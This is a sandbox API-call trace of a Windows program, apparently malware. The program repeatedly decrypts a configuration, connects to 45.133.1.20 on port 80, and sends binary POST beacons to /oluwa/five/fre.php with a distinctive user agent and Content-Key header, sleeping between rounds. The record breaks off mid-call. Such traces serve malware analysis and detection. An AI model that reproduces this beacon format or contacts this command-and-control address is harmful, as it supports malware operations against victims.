CryptImportKey (in: hProv=0x6bf058, pbData=0x6d8740, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0286.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.969] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.971] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.971] GetProcessHeap () returned 0x6a0000 [0286.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8740 | out: hHeap=0x6a0000) returned 1 [0286.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.973] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0286.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.980] CryptDestroyKey (hKey=0x6ad060) returned 1 [0286.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.981] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0286.981] GetProcessHeap () returned 0x6a0000 [0286.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0286.987] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.988] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0286.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.989] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0286.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.990] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0286.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.992] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0286.992] GetProcessHeap () returned 0x6a0000 [0286.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0286.992] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0286.992] GetProcessHeap () returned 0x6a0000 [0286.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0286.993] GetProcessHeap () returned 0x6a0000 [0286.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0286.993] GetProcessHeap () returned 0x6a0000 [0286.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0286.994] GetProcessHeap () returned 0x6a0000 [0286.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0286.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.995] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.003] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0287.014] GetProcessHeap () returned 0x6a0000 [0287.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0287.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.016] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0287.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.017] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.021] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.021] GetProcessHeap () returned 0x6a0000 [0287.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0287.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.023] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0287.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.024] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0287.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.026] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0287.026] GetProcessHeap () returned 0x6a0000 [0287.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0287.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.028] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0287.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.029] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0287.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.030] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0287.032] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.032] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0287.032] GetProcessHeap () returned 0x6a0000 [0287.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0287.032] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0287.032] GetProcessHeap () returned 0x6a0000 [0287.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0287.032] socket (af=2, type=1, protocol=6) returned 0xa94 [0287.033] connect (s=0xa94, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0287.063] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0287.063] GetProcessHeap () returned 0x6a0000 [0287.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0287.063] GetProcessHeap () returned 0x6a0000 [0287.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0287.064] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0287.065] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0287.065] GetProcessHeap () returned 0x6a0000 [0287.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5e00 [0287.065] GetProcessHeap () returned 0x6a0000 [0287.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0287.066] GetProcessHeap () returned 0x6a0000 [0287.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0287.066] GetProcessHeap () returned 0x6a0000 [0287.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0287.067] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0287.068] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0287.068] GetProcessHeap () returned 0x6a0000 [0287.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0287.069] GetProcessHeap () returned 0x6a0000 [0287.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0287.069] send (s=0xa94, buf=0x6bd460*, len=242, flags=0) returned 242 [0287.070] send (s=0xa94, buf=0x6bb998*, len=159, flags=0) returned 159 [0287.070] GetProcessHeap () returned 0x6a0000 [0287.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0287.070] recv (in: s=0xa94, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0287.154] GetProcessHeap () returned 0x6a0000 [0287.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0287.154] GetProcessHeap () returned 0x6a0000 [0287.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0287.155] GetProcessHeap () returned 0x6a0000 [0287.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5e00 | out: hHeap=0x6a0000) returned 1 [0287.155] GetProcessHeap () returned 0x6a0000 [0287.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0287.155] closesocket (s=0xa94) returned 0 [0287.156] GetProcessHeap () returned 0x6a0000 [0287.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0287.156] GetProcessHeap () returned 0x6a0000 [0287.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0287.157] GetProcessHeap () returned 0x6a0000 [0287.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0287.158] GetProcessHeap () returned 0x6a0000 [0287.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0287.158] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x2a4) returned 0xa94 [0287.160] Sleep (dwMilliseconds=0xea60) [0287.162] GetProcessHeap () returned 0x6a0000 [0287.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0287.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.164] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.214] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0287.224] GetProcessHeap () returned 0x6a0000 [0287.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0287.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.231] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0287.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.233] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.234] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.234] GetProcessHeap () returned 0x6a0000 [0287.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0287.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.236] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0287.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.237] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0287.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.238] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0287.238] GetProcessHeap () returned 0x6a0000 [0287.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0287.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.240] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0287.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.241] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0287.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.243] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0287.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.244] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0287.244] GetProcessHeap () returned 0x6a0000 [0287.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0287.244] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0287.244] GetProcessHeap () returned 0x6a0000 [0287.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0287.245] GetProcessHeap () returned 0x6a0000 [0287.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0287.245] GetProcessHeap () returned 0x6a0000 [0287.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0287.246] GetProcessHeap () returned 0x6a0000 [0287.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0287.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.247] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.256] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0287.265] GetProcessHeap () returned 0x6a0000 [0287.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0287.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.266] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0287.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.267] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.269] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.269] GetProcessHeap () returned 0x6a0000 [0287.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0287.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.271] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0287.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.272] CryptDestroyKey (hKey=0x6ad020) returned 1 [0287.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.274] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0287.274] GetProcessHeap () returned 0x6a0000 [0287.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0287.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.275] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0287.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.276] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0287.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.278] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0287.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.279] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0287.279] GetProcessHeap () returned 0x6a0000 [0287.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0287.279] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0287.279] GetProcessHeap () returned 0x6a0000 [0287.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0287.279] socket (af=2, type=1, protocol=6) returned 0xa98 [0287.280] connect (s=0xa98, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0287.308] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0287.308] GetProcessHeap () returned 0x6a0000 [0287.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0287.308] GetProcessHeap () returned 0x6a0000 [0287.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0287.309] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0287.310] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0287.310] GetProcessHeap () returned 0x6a0000 [0287.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c6340 [0287.310] GetProcessHeap () returned 0x6a0000 [0287.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0287.311] GetProcessHeap () returned 0x6a0000 [0287.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0287.311] GetProcessHeap () returned 0x6a0000 [0287.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0287.312] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0287.313] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0287.313] GetProcessHeap () returned 0x6a0000 [0287.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0287.313] GetProcessHeap () returned 0x6a0000 [0287.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0287.314] send (s=0xa98, buf=0x6bd460*, len=242, flags=0) returned 242 [0287.315] send (s=0xa98, buf=0x6bb998*, len=159, flags=0) returned 159 [0287.315] GetProcessHeap () returned 0x6a0000 [0287.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0287.315] recv (in: s=0xa98, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0287.400] GetProcessHeap () returned 0x6a0000 [0287.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0287.400] GetProcessHeap () returned 0x6a0000 [0287.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0287.401] GetProcessHeap () returned 0x6a0000 [0287.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6340 | out: hHeap=0x6a0000) returned 1 [0287.401] GetProcessHeap () returned 0x6a0000 [0287.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0287.401] closesocket (s=0xa98) returned 0 [0287.402] GetProcessHeap () returned 0x6a0000 [0287.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0287.402] GetProcessHeap () returned 0x6a0000 [0287.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0287.403] GetProcessHeap () returned 0x6a0000 [0287.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0287.403] GetProcessHeap () returned 0x6a0000 [0287.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0287.404] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15f4) returned 0xa98 [0287.406] Sleep (dwMilliseconds=0xea60) [0287.407] GetProcessHeap () returned 0x6a0000 [0287.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0287.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.409] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.418] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0287.435] GetProcessHeap () returned 0x6a0000 [0287.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0287.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.436] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0287.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.438] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.439] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.439] GetProcessHeap () returned 0x6a0000 [0287.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0287.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.441] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, 